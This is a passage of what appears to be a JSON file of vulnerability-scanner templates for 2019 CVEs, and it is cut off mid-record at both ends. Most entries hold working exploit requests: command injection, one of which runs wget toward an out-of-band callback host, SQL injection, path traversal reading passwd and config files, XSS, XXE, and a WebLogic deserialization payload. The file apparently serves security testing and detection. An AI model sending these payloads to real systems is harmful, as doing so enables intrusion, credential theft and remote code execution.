}","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/search/"],"body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo","PHP Version"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"word","part":"header","words":["Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void 